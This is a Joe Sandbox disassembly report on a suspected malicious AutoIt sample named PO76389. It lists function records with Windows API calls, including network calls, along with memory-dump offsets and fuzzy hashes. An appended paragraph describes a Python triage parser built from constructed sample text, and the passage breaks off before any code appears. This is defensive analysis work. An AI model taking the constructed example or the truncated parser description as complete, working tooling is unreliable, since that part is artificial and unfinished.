                                                    • Instruction ID: 58e519e359d78b441a91f263b6fe08d150af4a8d0d33529ccac4baa79a94c419
                                                    • Opcode Fuzzy Hash: 0acffda7807c671b9d86241ccfdae4fb34e7b1c789a6d04d30ed40833a383a9b
                                                    • Instruction Fuzzy Hash: 46124B75A0060ADFCF24CF98C490AEDBBB1FF58310F25855AE859AB351D734AE81CB94
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 004EECA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 3565006973-3941886329
                                                    • Opcode ID: 8f8857763cb97ff725330b37416b4e7cf353cd91c13169a53bb02e745ae6c4a0
                                                    • Instruction ID: d93b2b7386716bd0673371752b52bce42f15c5f8cc3f6f5623ffc0872224e64e
                                                    • Opcode Fuzzy Hash: 8f8857763cb97ff725330b37416b4e7cf353cd91c13169a53bb02e745ae6c4a0
                                                    • Instruction Fuzzy Hash: 9A913770600602AFDB14CF66C884B6ABBF5BF48711F24856EF94ACB391DB75E841CB64
                                                    APIs
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • __wcsnicmp.LIBCMT ref: 004FE785
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004FE84E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 1eba0739a656a7820635f6b126cb628fa80e7cd4b1cd5a887a00b6f850b9d586
                                                    • Instruction ID: 2e94857dbd1719972605aeeba7efc918bf56a6169e1375c389f0c1ce2030878d
                                                    • Opcode Fuzzy Hash: 1eba0739a656a7820635f6b126cb628fa80e7cd4b1cd5a887a00b6f850b9d586
                                                    • Instruction Fuzzy Hash: 9C616175A00219AFCB14EB55C891EBEB7F4AF48310F00406EF606AB3A1DB78AE45CB55
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 004B1B83
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 004B1B9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 892a91aea83e9f226029ee1c89f62db3d3e1a19bf2a2f73614bb8fc3f4b62bed
                                                    • Instruction ID: 348570ff887e0ad766ae4fc1b8b53849191e3c46c76df4d6672f9269889c155b
                                                    • Opcode Fuzzy Hash: 892a91aea83e9f226029ee1c89f62db3d3e1a19bf2a2f73614bb8fc3f4b62bed
                                                    • Instruction Fuzzy Hash: EB515971408744ABE360AF25D885FABBBE8FF98354F41484DF5C8410A2EFB5856CC76A
                                                    APIs
                                                      • Part of subcall function 004B417D: __fread_nolock.LIBCMT ref: 004B419B
                                                    • _wcscmp.LIBCMT ref: 004FCF49
                                                    • _wcscmp.LIBCMT ref: 004FCF5C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 4ac98a7750787fa9139d01f7ceed9dfbe015a695e311ff8b54887700a21c3950
                                                    • Instruction ID: 0aa6eb66a3ac471882229a4fd6ab9166df3b66e5781b364c4a7577b84fd4d8e3
                                                    • Opcode Fuzzy Hash: 4ac98a7750787fa9139d01f7ceed9dfbe015a695e311ff8b54887700a21c3950
                                                    • Instruction Fuzzy Hash: D541E532A0021DBADF10DBA5CC85FEFBBB9AF89714F00046EF601A7181D7759A448B69
                                                    APIs
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __getbuf.LIBCMT ref: 004D9B8A
                                                    • __lseeki64.LIBCMT ref: 004D9BFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                    • String ID: pMN
                                                    • API String ID: 3311320906-2130963613
                                                    • Opcode ID: fb48e36ba5fe7d7c044a636ae9500b257416d4d4d2d19c1c37b326bd29f7240a
                                                    • Instruction ID: 1cbfb9cb814e982428d3eaf1433458556e0a2abdfd0fe2dbdfc88d102f5fd7cd
                                                    • Opcode Fuzzy Hash: fb48e36ba5fe7d7c044a636ae9500b257416d4d4d2d19c1c37b326bd29f7240a
                                                    • Instruction Fuzzy Hash: 07412E71500B059ED7349B29D8B1A7B7BE4AB42320F04861FE4AACB3D1E77CEC418B19
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0051A668
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0051A67D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: cbe4e685e30cc7fb3f38beb8236185244d1992b7b9622475b94d38a7ead8d815
                                                    • Instruction ID: d8d01ba99602949771ea763aeee4e61195e4251c2c070d44a396fa490d120bc1
                                                    • Opcode Fuzzy Hash: cbe4e685e30cc7fb3f38beb8236185244d1992b7b9622475b94d38a7ead8d815
                                                    • Instruction Fuzzy Hash: 6F411475A013099FEF15CFA8D880BDA7BB5FB08300F15046AE919EB381D770A985DFA1
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0051961B
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00519657
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: fa1f5145f64e373396c2325d3841eaecb1fdb115ee1924b78121f50756903d3b
                                                    • Instruction ID: 59e327e739370cef72a18ce1d1652c9a9ab15f2af8c0c15890f54a8499a9e6bb
                                                    • Opcode Fuzzy Hash: fa1f5145f64e373396c2325d3841eaecb1fdb115ee1924b78121f50756903d3b
                                                    • Instruction Fuzzy Hash: 0E31AD31100604AEEB109F64DC91FFB7BB9FF58764F008619F8A9C7190CA30AC91DB64
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5BE4
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004F5C1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: e5cfed0b9f4b28f7fe155a52562614ca90094bb742465913293c20cc9a83826e
                                                    • Instruction ID: 537aae4a87b9d8314851fb48e2e8dbc38b530534c1784c02959ac1e22b53897b
                                                    • Opcode Fuzzy Hash: e5cfed0b9f4b28f7fe155a52562614ca90094bb742465913293c20cc9a83826e
                                                    • Instruction Fuzzy Hash: DF31D43160074DABDB248F99D885BBEBBF4AF06350F18001BEB86962A0D7789A44DB55
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 00506BDD
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 3506404897-2584243854
                                                    • Opcode ID: bac1237c3865fafced97e6ffeefd4cc70cb2ffcb0a4af99f20da700f17dfb0cc
                                                    • Instruction ID: 6fa9dff6919a5cc677bb218059d68f63a330637b474f1bdc53337b0e13c2da55
                                                    • Opcode Fuzzy Hash: bac1237c3865fafced97e6ffeefd4cc70cb2ffcb0a4af99f20da700f17dfb0cc
                                                    • Instruction Fuzzy Hash: B3218D71600219AACF10EFA5C882EEE7BB5FF44704F00485AF505AB182DB75EE56CBB5
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00519269
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00519274
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: ea81d3ded665def699a888c703b2dac47a48ba3d080b0fb38655f76ad3a15379
                                                    • Instruction ID: 46529419be7703d818b7288ed2e6ecea8706655c78ecaf2736c22d891f958080
                                                    • Opcode Fuzzy Hash: ea81d3ded665def699a888c703b2dac47a48ba3d080b0fb38655f76ad3a15379
                                                    • Instruction Fuzzy Hash: 9A11E675300208BFFF118E54DC91EEB3BAAFB993A4F104124F92897290D635DC909BA0
                                                    APIs
                                                      • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                      • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                      • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    • GetWindowRect.USER32(00000000,?), ref: 00519775
                                                    • GetSysColor.USER32(00000012), ref: 0051978F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 114ca6ee96d99df717d22644e5ebe078f61ebdffd51a6b4d797bd7689eaa8767
                                                    • Instruction ID: 5d99e655dd0dd94908804268eb7e22e8e309c9dfd0342f3456e7de79314aa4ae
                                                    • Opcode Fuzzy Hash: 114ca6ee96d99df717d22644e5ebe078f61ebdffd51a6b4d797bd7689eaa8767
                                                    • Instruction Fuzzy Hash: 13115972520209AFEB04DFB8D846EFA7BB8FF09304F040929F956D3280D634E891DB60
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 005194A6
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005194B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 8c1be1ab0caaac9ce5f1d50a6bad634625e96a7dba34759935d3b8333ea4955e
                                                    • Instruction ID: f932f623e2e86a431993c14aa103985e7fefc703bd89654a405a3d8d9c102f87
                                                    • Opcode Fuzzy Hash: 8c1be1ab0caaac9ce5f1d50a6bad634625e96a7dba34759935d3b8333ea4955e
                                                    • Instruction Fuzzy Hash: 9A115B71100204ABFF108E64AC95EEB3B69FB15378F104724F965931D0C7B59C96ABA1
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5CF3
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004F5D12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 15be5f7376850a4f83e39bc490c162422549564f7a3b504df4f0efd5f85dd857
                                                    • Instruction ID: 28a035e9e8d1587cfa73f6ba02fc4350920896900ad57851a0d6a53f687d6bf2
                                                    • Opcode Fuzzy Hash: 15be5f7376850a4f83e39bc490c162422549564f7a3b504df4f0efd5f85dd857
                                                    • Instruction Fuzzy Hash: 5711D671902A1CABEB20DB5CE848BBA77F8DB05344F144012EF55E7290D3749D05D799
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050544C
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00505475
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 2213712dacd397a9388cbd15499aa5e345b39bf53e78634d48c75640248345ca
                                                    • Instruction ID: a009ef07ff927178171e68ec01a46f0f5b44f103900767e4ed6004f4eed6efdd
                                                    • Opcode Fuzzy Hash: 2213712dacd397a9388cbd15499aa5e345b39bf53e78634d48c75640248345ca
                                                    • Instruction Fuzzy Hash: 94119E70541A21BADF258F618884EEFBEA8FF12752F10862AF54556080F270A984DEB0
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E4557
                                                    • ___raise_securityfailure.LIBCMT ref: 004E463E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: (W
                                                    • API String ID: 3761405300-2310960208
                                                    • Opcode ID: 4753c8a2e4f592209d55768386597b78d92cb94d5c241885fd2bb8140b4e75dc
                                                    • Instruction ID: a86798b25f633c7aae11c23cb5bb703a0dc1b9bcb5ae5fd8b1d34a9eb5619c86
                                                    • Opcode Fuzzy Hash: 4753c8a2e4f592209d55768386597b78d92cb94d5c241885fd2bb8140b4e75dc
                                                    • Instruction Fuzzy Hash: 3821EFB5510204DBD750DF59F995A417BE8AB68314F10682AE9098A3E0E3F469C8FF49
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: c7628033725248d75508cbe104690fe470925375dd271c94db4aca73e2b696cb
                                                    • Instruction ID: c56905aa418f1625e91a3face952fd55f1c0ed09e40b3d485e21a3fcc4123356
                                                    • Opcode Fuzzy Hash: c7628033725248d75508cbe104690fe470925375dd271c94db4aca73e2b696cb
                                                    • Instruction Fuzzy Hash: 1B01D236600305ABCB20AFB4D846FADBB74FF54724F10851AFA159B2D1D671E804C765
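The records on this page all share one layout (an APIs list, an empty Strings section, the Memory Dump Source block, the IDA plugin snapshot name, and the Similarity fields), so they can be parsed mechanically into structured data for triage. The Python below is an added example, not Joe Sandbox code: it parses that layout, strips the "Download File" link text that the web page leaves on the Associated lines, and flags records that touch network APIs either directly (the InternetOpenW/InternetSetOptionW record above, module WININET) or, for a record whose APIs list is empty, via the Similarity API ID (the htons/inet_addr record above). The sample report text is constructed from lines on this page and is not a verbatim copy of any one record; the set of network modules and API-ID fragments is an assumption of the example.

```python
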